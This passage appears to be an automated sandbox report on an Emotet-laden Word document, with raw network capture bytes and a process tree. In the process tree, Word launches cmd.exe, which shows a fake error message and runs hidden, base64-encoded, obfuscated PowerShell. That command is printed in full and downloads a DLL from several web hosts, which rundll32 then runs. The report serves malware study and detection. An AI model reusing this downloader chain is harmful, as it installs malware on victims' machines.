8d 95 ee 7a b0 ea 9b f2 48 8a d6 40 b5 cb 25 0f bd 5b 0b 8d 29 8c 59 13 51 9d af 13 e7 13 c6 e6 10 3e 28 cf 0c 07 35 69 13 7a 5e 2e fa 8b 70 58 e8 42 a9 46 81 69 da 39 68 64 ef cb 82 3c 62 09 f9 d0 dd 46 d5 f3 45 a6 8f 38 4f a6 05 b8 7b 13 19 04 68 68 1d c2 14 79 eb 5c 4b 15 f4 2a 02 ee 0c 75 ca 33 5e c5 e1 4f d9 e8 68 6f 32 ff a3 75 ee 72 6b d1 46 e7 f2 9b 41 21 c0 c8 cd e9 30 9d c8 f7 f9 de 43 49 05 6c f7 c0 6a f5 31 46 a4 ec 13 6b bd c3 3a e4 96 3d 15 58 1d 7d 4a 0e cc 28 43 e7 9f 4d 6b 64 96 d6 d8 5b da 51 e7 92 fa e6 a8 9a a2 51 0f d5 a5 68 5c 29 c9 00 da 7e 8c 86 2c 89 43 99 ee 92 34 aa 5f 8e a1 7b 07 2c 9e 7c fb 24 70 5d 92 94 be 7e a1 17 aa aa d0 d7 96 53 d9 4c 8e 15 d8 36 60 21 50 75 03 56 02 20 3f 73 d7 92 0a f4 4a c7 18 1e 4b 56 76 b8 67 21 e6 c3 42 58 a3 44 84 1c 59 a6 9a 8b ec 36 b0 3d 89 6b 89 81 26 ed d5 04 75 a8 c8 c5 c1 ea 70 9f 67 0a c2 03 07 cd 80 29 a6 55 92 6b 4b 1e 45 c4 dc d4 af d9 f3 ed 36 5b 77 7f 9b aa 23 16 69 da 9c 3e 18 57 76 11 71 9b 48 ec e6 9a 22 d5 9b 59 5f 53 e5 92 1b fc c8 4d 09 b3 78 99 f5 19 57 64 ae a0 ca 3c 19 c7 95 02 62 1d 16 a8 5a e8 fb 73 30 d0 39 04 fd 0d c0 89 3f 86 01 b0 3c 85 b4 b8 43 60 4f 0e a8 0a a7 3a 6f 18 cb bb c7 29 55 39 f2 21 6b c8 1f e3 87 c0 e5 55 04 c7 09 56 2a f9 bc 9a 36 b4 1d 0a 35 c8 8e 89 1e 6c 73 34 f9 c2 4f 8c 63 a3 bf 85 55 6d 81 c9 df e4 d5 16 e0 d6 5b 26 87 04 3d 83 bd 13 f6 38 88 49 02 43 d3 bf b8 1c 54 c6 b5 d7 4d 76 28 dc ab 94 5a 80 55 35 a4 85 d6 54 90 e9 68 6f 44 76 c1 78 f7 29 0d 14 f0 70 93 4d 08 3b 3d d6 8a 0a 05 c9 ca 0b 88 ce 98 97 7a 67 6a 7e 89 ab db 47 05 40 0d ec 3e 54 f5 42 d4 b7 3a 6c b1 ec 3b 10 0b aa 9a a6 bc 51 d1 94 db c0 59 ff ca 5e b0 ce 99 72 28 be 6e 9d d6 8f 10 d8 38 1d 28 9d 34 91 aa 28 f8 f5 3b 9a 31 da f3 60 2d 1e 69 b9 bd 74 7c b7 a9 09 a9 7d 19 92 d5 d1 2e f0 3e c2 41 c1 cd 3a c5 01 7d 42 88 4a fb 88 a2 14 32 3d 18 46 98 cf 7c ce 3b 69 67
                                            Data Ascii: a54|1TwTy46"+A^)C"KTE$.Is!T_SItw'a'R$A]J`\A3~$PDz+W]_R/?t,KQxhe:Mx"Duo[XVYm|xf..e.?h#Ot&~*i^<!rP |L4O} Gwa/SbQZOY.<GM.y'4q1c_#:/MuS<0'(S[Ae`f~-</xcIG=wq,"y$uTN^M}s+{nq{e\0+&3#zH@%[)YQ>(5iz^.pXBFi9hd<bFE8O{hhy\K*u3^Oho2urkFA!0CIlj1Fk:=X}J(CMkd[QQh\)~,C4_{,|$p]~SL6`!PuV ?sJKVvg!BXDY6=k&upg)UkKE6[w#i>WvqH"Y_SMxWd<bZs09?<C`O:o)U9!kUV*65ls4OcUm[&=8ICTMv(ZU5ThoDvx)pM;=zgj~G@>TB:l;QY^r(n8(4(;1`-it|}.>A:}BJ2=F|;ig
                                            Jan 6, 2021 08:45:31.780126095 CET231INData Raw: 91 fc ed 65 23 2d ef 19 ee 69 9a fb be 75 8e 9c bd 09 46 69 20 50 c9 b8 eb 89 47 10 1b cc 89 fc c5 fc 71 86 83 5f 9f 5d a7 a9 bb c3 9c d2 c2 1d 53 19 df 9c 5d 9e 12 d5 b1 e1 db 3c 5b 8d 4f 43 72 97 55 0c 7d 18 fa f1 6c ff b3 c0 0d 96 21 56 fe 07
                                            Data Ascii: e#-iuFi PGq_]S]<[OCrU}l!V,#1VoeBD{RY.S^$'bC%@,5W)k7+$t>[XZRO)FKiji3HBtm,x]^CT*=*XuKZoSN'
                                            Jan 6, 2021 08:45:31.851975918 CET232INData Raw: cd af c5 18 85 d0 be ee e4 ba a9 9e 7d 54 c3 65 88 a0 3a f5 c6 ba 61 8b 38 b5 54 d7 c4 b4 38 dd a8 2e df 27 e7 ec 7e 8d 1e fa 0b 8f 38 63 f2 01 62 0d 6b 88 fa 00 e9 72 47 a3 a1 22 0a 1c 55 07 3a 8e a9 3d 7d 70 f8 74 10 50 85 64 00 7e ed b7 84 e5
                                            Data Ascii: }Te:a8T8.'~8cbkrG"U:=}ptPd~)FbM~M/r< 'u;D=T--zjuz$\`R0)?g0


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: WINWORD.EXE PID: 532 Parent PID: 584

                                            General

                                            Start time:08:44:40
                                            Start date:06/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fe70000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: cmd.exe PID: 1604 Parent PID: 1220

                                            General

                                            Start time:08:44:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                            Imagebase:0x4a370000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: msg.exe PID: 2524 Parent PID: 1604

                                            General

                                            Start time:08:44:43
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xffc10000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: powershell.exe PID: 2544 Parent PID: 1604

                                            General

                                            Start time:08:44:43
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
                                            Imagebase:0x13fed0000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, Author: Florian Roth
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2808 Parent PID: 2544

                                            General

                                            Start time:08:44:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                            Imagebase:0xffde0000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2724 Parent PID: 2808

                                            General

                                            Start time:08:44:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: rundll32.exe PID: 2468 Parent PID: 2724

                                            General

                                            Start time:08:44:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
